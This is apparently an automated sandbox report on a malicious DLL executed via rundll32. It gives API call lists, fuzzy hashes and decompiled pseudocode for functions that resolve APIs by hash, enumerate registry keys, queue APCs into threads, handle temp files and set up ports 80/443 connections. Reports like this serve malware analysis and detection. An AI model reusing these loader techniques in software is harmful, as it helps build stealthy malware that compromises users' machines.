API ID: AllocHeaplstrlenmemcpymemset
String ID:
API String ID: 422472530-0
Opcode ID: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
Instruction ID: bc1187ca6e9429620bd200782e7290a68718eb3a581ccfc4400d3cdfedcb2126
Opcode Fuzzy Hash: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
Instruction Fuzzy Hash: 49014832214B8886EB45DF26A84039977A2F78CFC0F498121EE5943B15DF38E655C700

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exePID: 5932, Parent PID: 5972COMMON

Executed Functions

Function 0000000180006344 Relevance: 31.7, APIs: 21, Instructions: 220
memorystringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32(00000000,00000001800061B8), ref: 000000018000638C
GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180006397

Part of subcall function 00000001800066A8: Sleep.KERNEL32 ref: 00000001800066D2
Part of subcall function 00000001800066A8: GetSystemTimeAsFileTime.KERNEL32 ref: 00000001800066DD
Part of subcall function 00000001800066A8: HeapAlloc.KERNEL32 ref: 00000001800066F1

lstrlenA.KERNEL32 ref: 00000001800063E6
lstrlenA.KERNEL32 ref: 00000001800063F2
HeapAlloc.KERNEL32 ref: 0000000180006405
lstrcpyA.KERNEL32 ref: 000000018000641D
lstrcatA.KERNEL32 ref: 0000000180006444
lstrcatA.KERNEL32 ref: 0000000180006450
lstrlenA.KERNEL32 ref: 0000000180006482
HeapAlloc.KERNEL32 ref: 000000018000649B
_snprintf.NTDLL ref: 000000018000650F
HeapFree.KERNEL32 ref: 000000018000651E
HeapAlloc.KERNEL32 ref: 0000000180006577
_snprintf.NTDLL ref: 00000001800065E5
_snprintf.NTDLL ref: 0000000180006614
HeapFree.KERNEL32 ref: 000000018000662C
HeapFree.KERNEL32 ref: 000000018000663C
HeapFree.KERNEL32 ref: 000000018000664A
HeapFree.KERNEL32 ref: 0000000180006658
HeapFree.KERNEL32 ref: 000000018000666B
HeapFree.KERNEL32 ref: 0000000180006679

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Free$AllocTime$_snprintflstrlen$FileSleepSystemlstrcat$lstrcpy
String ID:
API String ID: 4119021385-0
Opcode ID: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
Instruction ID: 6db0b8cd80ef826fc55d87cfc33604410ea95bd32740a9bcb331c0de9eda71bb
Opcode Fuzzy Hash: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
Instruction Fuzzy Hash: 05919431214A4986E785DF26E8043DAB3A1F78DFC4F548121FE4A83764EE39C60EC740

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000508C Relevance: 19.7, APIs: 13, Instructions: 241
memoryregistrythreadCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E0000000118000508C(void* __ecx, void* __esi, long long __rax, long long __rbx, long long __rcx, void* __r9) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				long _t55;
				long _t57;
				void* _t65;
				void* _t114;
				void* _t115;
				long long* _t146;
				void* _t147;
				void* _t153;
				int _t188;
				long long _t189;
				int _t191;
				long long _t192;
				struct _CRITICAL_SECTION* _t198;
				void* _t201;
				void* _t202;
				signed short* _t211;
				void* _t214;
				void* _t215;
				long long _t216;
				void* _t217;
				long _t219;
				long _t223;
				void* _t225;

				_t154 = __rbx;
				_t146 = __rax;
				_t115 = __esi;
				 *((long long*)(_t201 + 0x20)) = __rbx;
				 *((long long*)(_t201 + 8)) = __rcx;
				_t202 = _t201 - 0x230;
				_t199 =  *0x8000d4a0;
				r14d =  *0x8000d498;
				HeapAlloc(_t225, _t223, _t219);
				r12d = 0;
				_t189 = __rax;
				if (__rax == _t217) goto 0x80005419;
				memset(_t217, _t188, _t191);
				InitializeCriticalSection(_t198);
				_t5 = _t189 + 0x98; // 0x98
				_t216 = _t5;
				 *_t216 = _t216;
				 *((long long*)(__rax + 0xa0)) = _t216;
				if (E00000001180008B44(__ecx, __rax - _t217, __rax, __rbx, _t191, __rbx, _t214) != r12d) goto 0x8000540f;
				E00000001180007678(__ecx, __rax, _t154, _t191);
				E0000000118000459C(0xdc444c2b, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				if (_t146 == _t217) goto 0x80005144;
				r9d = 0;
				r8d = 0;
				 *_t146();
				goto 0x80005147;
				_t147 = _t217;
				 *(_t189 + 0x28) = _t147;
				if (_t147 != _t217) goto 0x8000515b;
				GetLastError();
				goto 0x80005408;
				r8d = 0x1102;
				HeapAlloc(??, ??, ??);
				_t192 =  *0x8000d4a0;
				if (_t192 == _t217) goto 0x80005226;
				 *_t192 = r12w; // executed
				_t55 = RegOpenKeyW(??, ??, ??); // executed
				if (_t55 != r12d) goto 0x80005216;
				goto 0x800051cf;
				r12d = r12d + 1;
				if (E00000001180009110(0x180000000, _t154, _t192, _t202 + 0x20, _t192, _t202 + 0x278, _t214) != 0) goto 0x800051ee;
				r9d = 0x104; // executed
				_t57 = RegEnumKeyW(??, ??, ??, ??); // executed
				if (_t57 == 0) goto 0x800051b6;
				r12d = 0;
				if (_t57 != 0x103) goto 0x80005203;
				 *0x8000d480 = _t192;
				RegCloseKey(??); // executed
				if (r12d == r12d) goto 0x80005234;
				HeapFree(??, ??, ??);
				goto 0x8000522b;
				if (8 != r12d) goto 0x8000540f;
				_t193 =  *0x8000d490;
				r8d = 8;
				memcpy(??, ??, ??);
				 *((intOrPtr*)(_t202 + 0x286)) = r12w;
				if (E00000001180005CA4(8, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x180011198) == r12d) goto 0x8000529c;
				if (E00000001180005CA4(_t61, 0, _t154, _t189, _t202 + 0x280, _t189,  *0x8000d490,  *0x8000d490 + 0x1800111f0) != r12d) goto 0x8000540f;
				_t28 = _t189 + 8; // 0x8
				_t186 = _t28;
				if (E00000001180006DCC(_t154, _t189, _t28, _t189, _t193) != r12d) goto 0x800052e2;
				E00000001180003C24(_t154, _t189, _t28, _t189, _t193,  *0x8000d4a0);
				 *((long long*)(_t189 + 0x30)) = 0x180000000;
				if (0x180000000 == _t217) goto 0x800052e2;
				_t30 = _t189 + 8; // 0x8
				_t65 = E00000001180003C24(_t154, _t30, _t28, _t189, _t193,  *0x8000d4a0);
				 *((long long*)(_t189 + 0x38)) = 0x180000000;
				_t90 =  !=  ? r12d : 8;
				_t132 = ( !=  ? r12d : 8) - r12d;
				if (( !=  ? r12d : 8) != r12d) goto 0x8000540f;
				if (E00000001180008708(_t65, _t114, _t154, _t189, _t186) != r12d) goto 0x80005302;
				goto 0x8000540f;
				_t211 =  *0x8000d490 + 0x18000f000;
				r9d = _t211[1] & 0x0000ffff;
				r11d =  *_t211 & 0x0000ffff;
				_t215 = __r9 + 8;
				if (_t216 - _t215 <= 0) goto 0x80005339;
				if ((r14d ^ 0xe49a1e6d) == r12d) goto 0x8000533c;
				E00000001180004ED8(r14d ^ 0xe49a1e6d, __r9 +  &(_t211[4]));
				goto 0x8000533c;
				if (_t217 != _t217) goto 0x8000534b;
				goto 0x8000540f;
				r14d = r14d ^ 0xecb028fc;
				if (_t216 - _t215 <= 0) goto 0x8000536e;
				if (r14d == r12d) goto 0x80005371;
				E00000001180004ED8(r14d, __r9 +  &(_t211[4]));
				goto 0x80005371;
				_t153 = _t217;
				if (_t153 == _t217) goto 0x80005341;
				 *(_t189 + 0x40) = _t211;
				 *0x8000d488 = _t189;
				GetModuleHandleA(??);
				if (_t153 ==  *((intOrPtr*)(_t202 + 0x270))) goto 0x800053fb;
				E0000000118000459C(0xaade337c, _t153,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				if (_t153 == _t217) goto 0x800053be;
				r8d = GetCurrentThreadId();
				 *_t153();
				goto 0x800053c1;
				if (_t217 == _t217) goto 0x80005150;
				E0000000118000459C(0x1c8cff93, _t153,  *((intOrPtr*)(_t199 + 0x18)));
				if (_t153 == _t217) goto 0x800053ee;
				QueueUserAPC(??, ??, ??); // executed
				goto 0x800053f1;
				if (r12d != r12d) goto 0x8000541e;
				goto 0x80005150;
				asm("lock add dword [ebp+0x38], 0x1");
				if (E00000001180002B60(_t115, _t189, __r9, _t215, _t216) == r12d) goto 0x8000541e;
				E00000001180005578(_t154, _t189, _t217);
				goto 0x8000541e;
				return 8;
			}

APIs

HeapAlloc.KERNEL32 ref: 00000001800050CB
memset.NTDLL ref: 00000001800050E8
InitializeCriticalSection.KERNEL32 ref: 00000001800050F1

Part of subcall function 0000000180008B44: GetModuleHandleA.KERNEL32(?,?,00000000,000000018000510D), ref: 0000000180008B6B
Part of subcall function 0000000180008B44: GetModuleHandleA.KERNEL32(?,?,00000000,000000018000510D), ref: 0000000180008B8B

Part of subcall function 0000000180007678: GetModuleHandleA.KERNEL32 ref: 00000001800076C7

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

GetLastError.KERNEL32 ref: 0000000180005150
HeapAlloc.KERNEL32 ref: 0000000180005171
RegOpenKeyW.ADVAPI32 ref: 00000001800051A5
RegEnumKeyW.ADVAPI32 ref: 00000001800051E2
RegCloseKey.KERNELBASE ref: 000000018000520B
HeapFree.KERNEL32 ref: 000000018000521E
memcpy.NTDLL ref: 000000018000524E
GetModuleHandleA.KERNEL32 ref: 0000000180005383
GetCurrentThreadId.KERNEL32 ref: 00000001800053A9
QueueUserAPC.KERNELBASE ref: 00000001800053EA

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: HandleModule$Heap$AllocErrorLast$CloseCriticalCurrentEnumFreeInitializeOpenQueueSectionThreadUsermemcpymemset
String ID:
API String ID: 909755087-0
Opcode ID: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
Instruction ID: 9261d350846713a6d61e62943f4705d1cd3b2ba236d4958cf944a875f2eb3085
Opcode Fuzzy Hash: 23df82f8670f2ca5d57fcd725f6ce51a55fb78b39f2e81572481ed79961b9dbc
Instruction Fuzzy Hash: 1AA15C32204B4D92EAE6DB22E4953EE7391B78C7C5F50C421EA8A47795DE78CB9DC301

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001844 Relevance: 19.7, APIs: 13, Instructions: 167
memoryfilestringCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 15%

			E00000001180001844(long long __rbx, void* __rcx, intOrPtr* __rdx, long long _a8, int _a16, char _a24, signed int _a32) {
				signed long long _v72;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				long _t27;
				int _t32;
				int _t34;
				void* _t36;
				int _t53;
				int _t61;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr* _t92;
				signed long long _t93;
				intOrPtr* _t106;
				void* _t118;
				void* _t121;
				intOrPtr* _t122;
				intOrPtr* _t123;
				void* _t125;
				signed long long _t132;
				void* _t140;
				void* _t145;

				_t94 = __rbx;
				_a8 = __rbx;
				_t92 =  *0x8000d4a0;
				r12d = 0;
				_t145 = __rcx;
				if (__rdx == _t140) goto 0x80001a6f;
				if ( *__rdx == r12b) goto 0x80001a6f;
				E00000001180007B04(__rbx, __rdx, _t118, _t121, _t125, __rdx);
				if (_t92 == _t140) goto 0x80001a6a;
				_t93 =  *0x8000d4a0;
				_t27 = GetTempPathW(??, ??);
				if (_t27 == r12d) goto 0x80001a55;
				HeapAlloc(??, ??, ??);
				if (_t93 == _t140) goto 0x80001a55;
				if (GetTempPathW(??, ??) == r12d) goto 0x80001916;
				GetSystemTimeAsFileTime(??);
				r8d = GetCurrentThreadId() ^ _a32; // executed
				_t32 = GetTempFileNameW(??, ??, ??, ??); // executed
				if (_t32 != r12d) goto 0x80001927;
				_t132 = _t93;
				HeapFree(??, ??, ??);
				if (_t140 == _t140) goto 0x80001a55;
				_t122 = _t92;
				__imp__StrChrW();
				r8d = 0;
				if (_t93 == _t132) goto 0x80001964;
				_a16 = _t27;
				goto 0x80001976;
				_t106 = _t122;
				_t34 = lstrlenW(??);
				r8d = 0;
				_a16 = _t34;
				if (_t34 == r8d) goto 0x800019a7;
				_t11 = _t106 - 1; // -1
				_t61 = _t11;
				_t68 =  *((intOrPtr*)(_t122 + _t93 * 2));
				if (_t68 == 0x20) goto 0x8000198e;
				if (_t68 != 9) goto 0x80001999;
				_t53 = _t61;
				_a16 = _t61;
				if (_t61 != r8d) goto 0x8000197b;
				if (_t53 == r8d) goto 0x800019a7;
				_t69 =  *_t122;
				if (_t69 == 0x20) goto 0x800019ad;
				if (_t69 != 9) goto 0x800019b9;
				_t123 = _t122 + 2;
				_a16 = _t53 - 1;
				goto 0x80001999;
				 *((intOrPtr*)(_t123 + _t93 * 2)) = r8w;
				if ( *_t123 == r8w) goto 0x800019ef;
				_v72 = _t132;
				r9d = 0;
				_t36 = E00000001180009B7C(_t94, _t145, _t123, _t140, _t123,  *((intOrPtr*)(_t93 + 8)), _t140);
				if (_t36 != 0) goto 0x80001a3c;
				if (_t93 + 2 == 0) goto 0x800019f4;
				goto 0x80001938;
				if (_t36 != r8d) goto 0x80001a3c;
				if (E00000001180003698(_t36 - r8d, _t94, _t140,  &_a24,  *((intOrPtr*)(_t93 + 8)),  &_a16, _t93) != 0) goto 0x80001a3c;
				r9d = _a16;
				E00000001180005BDC(_t94, _t145, _t93 + 2,  *((intOrPtr*)(_t93 + 8)), _a24);
				HeapFree(??, ??, ??);
				DeleteFileW(??); // executed
				HeapFree(??, ??, ??);
				goto 0x80001a5a;
				HeapFree(??, ??, ??);
				goto 0x80001a6f;
				return 8;
			}

0x180001844
0x180001844
0x180001858
0x18000185f
0x180001869
0x180001874
0x18000187d
0x180001888
0x180001893
0x180001899
0x1800018a8
0x1800018b3
0x1800018c3
0x1800018cf
0x1800018e3
0x1800018ed
0x180001908
0x18000190b
0x180001914
0x180001916
0x18000191e
0x18000192a
0x180001935
0x180001940
0x180001946
0x18000194f
0x18000195e
0x180001962
0x180001964
0x180001967
0x18000196d
0x180001972
0x180001979
0x18000197b
0x18000197b
0x18000197e
0x180001986
0x18000198c
0x18000198e
0x180001990
0x180001997
0x18000199c
0x18000199e
0x1800019a5
0x1800019ab
0x1800019ad
0x1800019b3
0x1800019b7
0x1800019bb
0x1800019c4
0x1800019c6
0x1800019cb
0x1800019d7
0x1800019e0
0x1800019e8
0x1800019ea
0x1800019f2
0x180001a0d
0x180001a0f
0x180001a22
0x180001a36
0x180001a3f
0x180001a4d
0x180001a53
0x180001a62
0x180001a68
0x180001a85

APIs

Part of subcall function 0000000180007B04: lstrlenA.KERNEL32 ref: 0000000180007B2B
Part of subcall function 0000000180007B04: HeapAlloc.KERNEL32 ref: 0000000180007B46
Part of subcall function 0000000180007B04: memset.NTDLL ref: 0000000180007B71

GetTempPathW.KERNEL32 ref: 00000001800018A8
HeapAlloc.KERNEL32 ref: 00000001800018C3
GetTempPathW.KERNEL32 ref: 00000001800018DA
GetSystemTimeAsFileTime.KERNEL32 ref: 00000001800018ED
GetCurrentThreadId.KERNEL32 ref: 00000001800018F3
GetTempFileNameW.KERNELBASE ref: 000000018000190B
HeapFree.KERNEL32 ref: 000000018000191E
StrChrW.SHLWAPI ref: 0000000180001940
lstrlenW.KERNEL32 ref: 0000000180001967
HeapFree.KERNEL32 ref: 0000000180001A36
DeleteFileW.KERNELBASE ref: 0000000180001A3F
HeapFree.KERNEL32 ref: 0000000180001A4D
HeapFree.KERNEL32 ref: 0000000180001A62

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Free$FileTemp$AllocPathTimelstrlen$CurrentDeleteNameSystemThreadmemset
String ID:
API String ID: 2968359827-0
Opcode ID: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
Instruction ID: f42bf4f4e696ed8dde712627642a23392779c5e7d82fb71db4855592268e1331
Opcode Fuzzy Hash: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
Instruction Fuzzy Hash: 1C51C931704548CAF7E6DB26A8543EA7691B78DBC1F54C015FE4687BA4EE3C8A4DC701

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004A14 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 156
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 24%

			E00000001180004A14(void* __ebx, void* __ecx, long long* __rax, long long __rbx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24, long long* _a40, void* _a48, intOrPtr _a56) {
				void* _v40;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v104;
				intOrPtr _v120;
				long long _v128;
				long long _v136;
				char _t57;
				intOrPtr _t95;
				void* _t96;
				long long* _t114;
				long long* _t115;

				_t114 = __rax;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t141 =  *0x8000d4a0;
				r14d = __ecx;
				_t95 = r8d;
				E0000000118000459C(0x4e1c2e77, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
				if (_t114 == 0) goto 0x80004a75;
				r9d = 0x18;
				r8d = 0;
				_v136 = 0xf0000040;
				 *_t114(); // executed
				goto 0x80004a77;
				if (0 == 0) goto 0x80004c20;
				r8d = _a56;
				_t10 =  &_v96; // -190
				if (E00000001180006D04(__rbx, _v88, __rsi, _t10) != 0) goto 0x80004c02;
				_t11 = _t114 + 0x10; // 0x10
				r15d = _t11;
				memset(??, ??, ??);
				E0000000118000459C(0xd74cfe41, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
				if (_t114 == 0) goto 0x80004ae3;
				r9d = 0;
				 *_t114();
				goto 0x80004ae5;
				if (0 != 0) goto 0x80004af9;
				if (GetLastError() != 0) goto 0x80004c02;
				_t57 =  >  ? r15d : _t95;
				r8d = _t57;
				_v104 = _t57;
				memcpy(??, ??, ??);
				_t96 = _t95 - _v104;
				if (r14d == 0) goto 0x80004b70;
				E0000000118000459C(0x4217c141, _t114,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
				if (_t114 == 0) goto 0x80004baa;
				r8d = 0;
				_t23 =  &_v104; // -198
				_v120 = 0x20;
				_v128 = _t23;
				_t26 =  &_v80; // -174
				r8b = _t96 == 0;
				_v136 = _t26;
				r9d = 0;
				 *_t114();
				goto 0x80004bac;
				E0000000118000459C(0x8ea73a36, _t114, _v96);
				if (_t114 == 0) goto 0x80004baa;
				r8d = 0;
				_t29 =  &_v104; // -198
				_v128 = _t29;
				r8b = _t96 == 0;
				_t31 =  &_v80; // -174
				_v136 = _t31;
				r9d = 0;
				 *_t114();
				goto 0x80004bac;
				if (0 == 0) goto 0x80004bd6;
				r8d = _v104;
				memcpy(??, ??, ??);
				if (_t96 == 0) goto 0x80004bde;
				goto 0x80004afd;
				GetLastError();
				_t115 = _a40;
				 *_t115 = 0 + _v104;
				E0000000118000459C(0xff709000, _t115,  *((intOrPtr*)( *0x8000d4a0 + 0x20)));
				if (_t115 == 0) goto 0x80004c02;
				 *_t115();
				E0000000118000459C(0xbaca8f4d, _t115,  *((intOrPtr*)(_t141 + 0x20)));
				if (_t115 == 0) goto 0x80004c28;
				 *_t115();
				goto 0x80004c28;
				return GetLastError();
			}

APIs

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

memset.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AB7
GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004AE9
memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004B15
memcpy.NTDLL(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BBD
GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004BD6
GetLastError.KERNEL32(?,?,00000000,?,00000000,00000000,00000001800099DB), ref: 0000000180004C20

Strings

, xrefs: 0000000180004B45
@, xrefs: 0000000180004A69

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: ErrorLast$memcpy$memset
String ID: $@
API String ID: 1408984137-1077428164
Opcode ID: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
Instruction ID: 6549d2ab533297c31cadfe8b85b87dceba819ad31def954566d9370a515f3166
Opcode Fuzzy Hash: be6200e352fab92637c5afd41c3fe7e33f93d86144c39c949b6fe9b9e880e760
Instruction Fuzzy Hash: A851607330574982EBA2DBA5A45079AB7A0FBCC7D0F548411BE8D87B49DF78CA08CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800027D4 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 187
memoryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 26%

			E000000011800027D4(long long __rbx, intOrPtr* __rcx, void* __rdx) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t100;
				long long* _t119;
				long long* _t120;
				long long* _t121;
				long long* _t122;
				long long* _t123;
				void* _t151;
				void* _t152;
				intOrPtr* _t153;
				void* _t155;
				void* _t158;
				long long* _t161;
				void* _t163;
				void* _t164;
				long _t176;
				void* _t178;
				void* _t181;
				void* _t184;

				_t123 = __rbx;
				 *((long long*)(_t163 + 0x10)) = __rbx;
				 *(_t163 + 0x18) = r8d;
				_t164 = _t163 - 0x50;
				_t119 =  *0x8000d4a0;
				_t156 =  *__rcx;
				_t153 = __rcx;
				r15d = r9d;
				E00000001180007B04(__rbx, __rdx, __rcx,  *__rcx, _t158, __rdx, _t184, _t181);
				if (_t119 == _t123) goto 0x80002a78;
				_t100 =  *((char*)(_t153 + 0x75)) - 6;
				_t5 = _t123 + 4; // 0x4
				r12d = _t5;
				if (_t100 > 0) goto 0x8000283e;
				if (_t100 != 0) goto 0x80002835;
				if ( *((char*)(_t153 + 0x74)) - 2 > 0) goto 0x8000283e;
				 *((intOrPtr*)(_t164 + 0x90)) = 0;
				goto 0x80002846;
				 *((intOrPtr*)(_t164 + 0x90)) = r12d;
				E0000000118000459C(0x3fe3c8ba, _t119,  *((intOrPtr*)(_t156 + 0x50)));
				if (_t119 == _t123) goto 0x80002871;
				r9d = 0;
				r8d = 0;
				 *((intOrPtr*)(_t164 + 0x20)) = 0;
				 *_t119(); // executed
				goto 0x80002874;
				_t120 = _t123;
				 *((long long*)(_t153 + 0x28)) = _t120;
				HeapFree(_t178, _t176, _t152);
				if ( *((intOrPtr*)(_t153 + 0x28)) == _t123) goto 0x80002a78;
				if ( *((intOrPtr*)(_t164 + 0xa0)) == 0) goto 0x800028ce;
				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
				if (_t120 == _t123) goto 0x800028c4;
				_t17 = _t164 + 0xa0; // 0x12
				r9d = r12d;
				 *_t120();
				goto 0x800028c6;
				if (0 == 0) goto 0x80002a78;
				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 8)), _t153, _t156, _t119, _t17, _t155, _t158);
				if (_t120 == _t123) goto 0x80002a78;
				 *((intOrPtr*)(_t164 + 0x90)) = 0x100;
				if ( *((intOrPtr*)(_t164 + 0xb0)) == 0) goto 0x80002938;
				 *((intOrPtr*)(_t164 + 0x40)) = 0xaa0;
				E0000000118000459C(0xe7f09937, _t120,  *((intOrPtr*)(_t156 + 0x50)));
				if (_t120 == _t123) goto 0x80002927;
				r9d = r12d;
				 *_t120();
				asm("bts dword [esp+0x90], 0x17");
				r12d = 0x1bb;
				goto 0x8000293e;
				r12d = 0x50;
				E0000000118000459C(0x7dda0345, _t120,  *((intOrPtr*)(_t156 + 0x50)));
				if (_t120 == _t123) goto 0x80002963;
				r9d = 0;
				r8d = r12w & 0xffffffff;
				 *_t120(); // executed
				goto 0x80002966;
				_t121 = _t123;
				 *((long long*)(_t153 + 0x30)) = _t121;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t153 + 0x30)) == _t123) goto 0x80002a78;
				E00000001180007B04(_t123,  *((intOrPtr*)(_t153 + 0x10)), _t153, _t156, _t120, _t120);
				_t161 = _t121;
				if (_t121 == _t123) goto 0x80002a78;
				E0000000118000459C(0xaa9d9fc1, _t121,  *((intOrPtr*)(_t156 + 0x50)));
				if (_t121 == _t123) goto 0x800029ed;
				_t151 =  !=  ?  *0x8000d490 + 0x180011260 :  *0x8000d490 + 0x180011278;
				r9d = 0;
				 *((intOrPtr*)(_t164 + 0x30)) =  *((intOrPtr*)(_t164 + 0x90));
				 *((long long*)(_t164 + 0x28)) = _t123;
				 *((long long*)(_t164 + 0x20)) = _t123;
				 *_t121(); // executed
				goto 0x800029f0;
				_t122 = _t123;
				 *((long long*)(_t153 + 0x38)) = _t122;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t153 + 0x38)) == _t123) goto 0x80002a78;
				 *((intOrPtr*)(_t164 + 0x44)) = 4;
				E0000000118000459C(0x677ec78c, _t122,  *((intOrPtr*)(_t156 + 0x50)));
				_t45 = _t161 + 0x1b; // 0x1f
				r12d = _t45;
				if (_t122 == _t123) goto 0x80002a40;
				 *_t122();
				goto 0x80002a42;
				if (0 == 0) goto 0x80002a80;
				asm("bts dword [esp+0x90], 0x8");
				E0000000118000459C(0xe7f09937, _t122,  *((intOrPtr*)(_t156 + 0x50)));
				if (_t122 == _t123) goto 0x80002a80;
				r9d = 4;
				 *_t122();
				goto 0x80002a80;
				return GetLastError();
			}

APIs

Part of subcall function 0000000180007B04: lstrlenA.KERNEL32 ref: 0000000180007B2B
Part of subcall function 0000000180007B04: HeapAlloc.KERNEL32 ref: 0000000180007B46
Part of subcall function 0000000180007B04: memset.NTDLL ref: 0000000180007B71

HeapFree.KERNEL32 ref: 0000000180002880
HeapFree.KERNEL32 ref: 0000000180002972
HeapFree.KERNEL32 ref: 00000001800029FC
GetLastError.KERNEL32(00000012,00000000,?,00000001800054C9,?,000000018000134F), ref: 0000000180002A78

Strings

P, xrefs: 0000000180002938

Memory Dump Source

Source File: 00000004.00000002.764516562.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000004.00000002.764474142.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764560940.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.764577670.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd

Similarity

API ID: Heap$Free$AllocErrorLastlstrlenmemset
String ID: P
API String ID: 1242601240-3110715001
Opcode ID: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
Instruction ID: b9b39858d45b2fed8cd52d627653eb03beea5c07a2efbf285fd96505e9c46d20
Opcode Fuzzy Hash: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
Instruction Fuzzy Hash: E2718B7230468897EBA2DF62A8443DA73A0F78DBC4F488425AF4E47B46CF38D658C710

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005CA4 Relevance: 7.6, APIs: 5, Instructions: 88
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

CreateFileW.KERNELBASE ref: 0000000180005D04
RtlInitUnicodeString.NTDLL ref: 0000000180005D20
NtQueryDirectoryFile.NTDLL ref: 0000000180005D8C
CloseHandle.KERNEL32 ref: 0000000180005DC5
GetLastError.KERNEL32 ref: 0000000180005DCD

Memory Dump Source

